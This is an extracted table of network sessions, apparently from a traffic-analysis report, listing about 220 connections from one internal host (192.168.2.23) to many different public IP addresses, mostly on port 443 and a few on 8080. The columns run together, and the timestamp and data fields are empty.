                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24603192.168.2.233714275.130.244.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24604192.168.2.2351168178.82.249.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24605192.168.2.2344184140.246.173.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24606192.168.2.2352010153.71.28.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24607192.168.2.2353148114.113.33.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24608192.168.2.2335910158.168.241.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24609192.168.2.2357616166.52.189.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24610192.168.2.2356008200.60.176.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24611192.168.2.2350396167.47.50.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24612192.168.2.235138659.215.81.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24613192.168.2.2350622193.141.109.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24614192.168.2.23460401.25.177.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24615192.168.2.2332986121.135.78.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24616192.168.2.2348578129.188.118.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24617192.168.2.235850486.166.158.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24618192.168.2.233841224.246.108.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24619192.168.2.2359006197.228.88.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24620192.168.2.2348090159.76.104.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24621192.168.2.2344064106.160.27.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24622192.168.2.2346516201.96.90.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24623192.168.2.2336864184.182.125.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24624192.168.2.235733232.104.193.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24625192.168.2.2335168181.4.162.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24626192.168.2.2335992157.179.4.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24627192.168.2.2342120183.191.141.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24628192.168.2.2358554210.214.178.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24629192.168.2.2348426145.13.108.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24630192.168.2.2336694115.238.90.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24631192.168.2.234078264.180.124.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24632192.168.2.234427054.91.128.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24633192.168.2.234958876.5.48.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24634192.168.2.2334410108.207.33.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24635192.168.2.2354056153.36.119.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24636192.168.2.233883874.81.247.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24637192.168.2.2337378112.183.127.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24638192.168.2.233539613.64.148.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24639192.168.2.2355562162.226.206.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24640192.168.2.2357334109.9.126.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24641192.168.2.234794835.23.204.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24642192.168.2.2360022164.234.214.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24643192.168.2.2357996134.144.85.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24644192.168.2.23438844.178.164.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24645192.168.2.2357940179.182.44.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24646192.168.2.2340084111.142.163.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24647192.168.2.2350060167.28.129.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24648192.168.2.2332906180.205.25.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24649192.168.2.2337308151.73.156.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24650192.168.2.2350094194.140.35.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24651192.168.2.233505482.101.228.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24652192.168.2.234269427.126.198.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24653192.168.2.2351722145.203.96.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24654192.168.2.235291819.26.247.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24655192.168.2.235104286.115.112.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24656192.168.2.233812685.253.4.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24657192.168.2.235965677.126.132.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24658192.168.2.2337340149.203.57.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24659192.168.2.2350784163.173.173.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24660192.168.2.233669883.89.54.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24661192.168.2.2333708130.113.215.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24662192.168.2.2349438123.108.105.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24663192.168.2.234777046.41.163.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24664192.168.2.2347082139.154.176.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24665192.168.2.2334380206.136.119.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24666192.168.2.2351628158.60.80.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24667192.168.2.2354318172.50.162.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24668192.168.2.2355918158.97.85.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24669192.168.2.2357580206.236.191.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24670192.168.2.234379698.19.163.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24671192.168.2.2348002153.87.199.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24672192.168.2.234726899.90.250.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24673192.168.2.2352074153.243.247.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24674192.168.2.23488741.74.77.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24675192.168.2.233800648.253.57.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24676192.168.2.2336090114.70.26.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24677192.168.2.2341088137.99.26.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24678192.168.2.2338146159.192.220.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24679192.168.2.234422866.89.108.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24680192.168.2.2339868157.83.12.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24681192.168.2.2348654153.7.141.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24682192.168.2.2344364147.250.213.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24683192.168.2.2360106201.235.188.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24684192.168.2.234505638.90.119.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24685192.168.2.2358466195.246.194.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24686192.168.2.235800232.55.179.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24687192.168.2.2356740182.229.137.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24688192.168.2.2336240105.95.151.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24689192.168.2.2343120106.89.71.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24690192.168.2.23584528.129.223.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24691192.168.2.235221464.222.107.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24692192.168.2.236044643.88.169.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24693192.168.2.2342274179.249.221.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24694192.168.2.235246634.105.21.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24695192.168.2.2345210150.167.202.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24696192.168.2.2335698118.41.18.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24697192.168.2.2352848155.227.199.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24698192.168.2.234863427.6.79.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24699192.168.2.233427273.62.53.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24700192.168.2.235131677.1.180.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24701192.168.2.2353286158.155.64.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24702192.168.2.2356762199.66.180.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24703192.168.2.2348808190.165.250.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24704192.168.2.2353452186.231.9.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24705192.168.2.2350016172.35.248.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24706192.168.2.2333648180.249.33.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24707192.168.2.234104679.80.253.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24708192.168.2.233633894.184.57.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24709192.168.2.233968068.58.221.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24710192.168.2.2333668186.211.243.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24711192.168.2.2338410217.63.40.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24712192.168.2.2349726113.176.129.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24713192.168.2.2348510220.149.182.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24714192.168.2.234829220.227.165.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24715192.168.2.2352362223.155.168.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24716192.168.2.2359474223.166.1.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24717192.168.2.234060413.222.21.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24718192.168.2.2355966118.55.134.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24719192.168.2.2338788108.68.58.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24720192.168.2.2346272119.106.211.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24721192.168.2.2340580107.231.111.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24722192.168.2.234920640.26.191.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24723192.168.2.233937690.235.200.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24724192.168.2.234992479.37.81.818080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24725192.168.2.234785859.115.166.2048080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24726192.168.2.234786259.115.166.2048080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24727192.168.2.2335932174.43.89.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24728192.168.2.235202279.47.31.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24729192.168.2.235366236.206.116.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24730192.168.2.2346870115.157.176.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24731192.168.2.2344742172.198.212.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24732192.168.2.2351936212.197.129.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24733192.168.2.2333470102.86.61.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24734192.168.2.234699448.107.253.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24735192.168.2.2333378200.184.211.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24736192.168.2.2344554130.62.188.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24737192.168.2.235759268.235.72.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24738192.168.2.2347048222.102.130.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24739192.168.2.2350008198.81.3.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24740192.168.2.2354000115.3.91.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24741192.168.2.2349690181.80.77.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24742192.168.2.2336316107.30.160.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24743192.168.2.233778832.26.108.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24744192.168.2.2346840170.223.99.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24745192.168.2.233770662.73.185.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24746192.168.2.2335982123.60.248.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24747192.168.2.2346734170.192.154.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24748192.168.2.2335348115.68.66.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24749192.168.2.2350146116.121.82.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24750192.168.2.2335348167.9.14.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24751192.168.2.2356986115.191.234.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24752192.168.2.233421665.132.170.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24753192.168.2.235162095.72.71.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24754192.168.2.2333862182.247.228.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24755192.168.2.2340946199.133.175.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24756192.168.2.2353660212.30.246.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24757192.168.2.2343452211.120.225.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24758192.168.2.2340804177.145.38.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24759192.168.2.2358374129.175.160.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24760192.168.2.23408541.66.40.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24761192.168.2.2354404167.131.209.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24762192.168.2.2335058205.148.6.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24763192.168.2.2337672106.138.199.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24764192.168.2.234749097.82.27.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24765192.168.2.233747243.158.217.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24766192.168.2.2347510223.221.25.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24767192.168.2.2343924120.214.183.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24768192.168.2.2334976205.61.56.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24769192.168.2.234256468.203.90.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24770192.168.2.234169053.252.46.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24771192.168.2.234183079.108.187.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24772192.168.2.235309264.233.31.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24773192.168.2.2333972116.69.83.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24774192.168.2.2342460204.178.205.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24775192.168.2.233767685.101.192.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24776192.168.2.2343488151.32.139.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24777192.168.2.235410457.87.151.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24778192.168.2.23586961.39.208.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24779192.168.2.2352818114.176.134.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24780192.168.2.2341912142.243.144.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24781192.168.2.2343290164.0.244.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24782192.168.2.235509838.83.251.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24783192.168.2.2334506157.141.188.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24784192.168.2.2336866131.1.160.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24785192.168.2.2356388219.249.42.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24786192.168.2.234825035.114.167.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24787192.168.2.235206050.24.170.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24788192.168.2.2349692190.107.197.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24789192.168.2.2356080129.223.175.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24790192.168.2.233727253.242.222.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24791192.168.2.2352540163.221.162.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24792192.168.2.2348134170.47.32.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24793192.168.2.234420263.60.51.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24794192.168.2.2337832143.188.179.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24795192.168.2.2341262108.157.201.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24796192.168.2.234389041.74.154.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24797192.168.2.2337196131.204.123.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24798192.168.2.2348370202.173.37.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24799192.168.2.234571834.214.72.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24800192.168.2.234428499.194.175.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24801192.168.2.2336248202.226.148.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24802192.168.2.2336534167.201.238.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24803192.168.2.2346212140.124.51.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24804192.168.2.233785677.134.2.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24805192.168.2.235476070.115.129.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24806192.168.2.2342108206.46.186.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24807192.168.2.2335874174.81.101.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24808192.168.2.2353520177.212.68.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24809192.168.2.2353636222.96.66.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24810192.168.2.2351924188.39.47.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24811192.168.2.236086494.4.102.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24812192.168.2.2333070142.152.154.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24813192.168.2.2337054102.117.134.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24814192.168.2.2354432138.105.151.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24815192.168.2.235539658.27.146.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24816192.168.2.235221086.160.108.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24817192.168.2.2360034159.138.232.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24818192.168.2.2353826205.128.28.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24819192.168.2.23490284.123.84.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24820192.168.2.233353675.198.78.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24821192.168.2.2348626198.208.142.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24822192.168.2.234236019.105.151.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24823192.168.2.2360580193.53.233.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
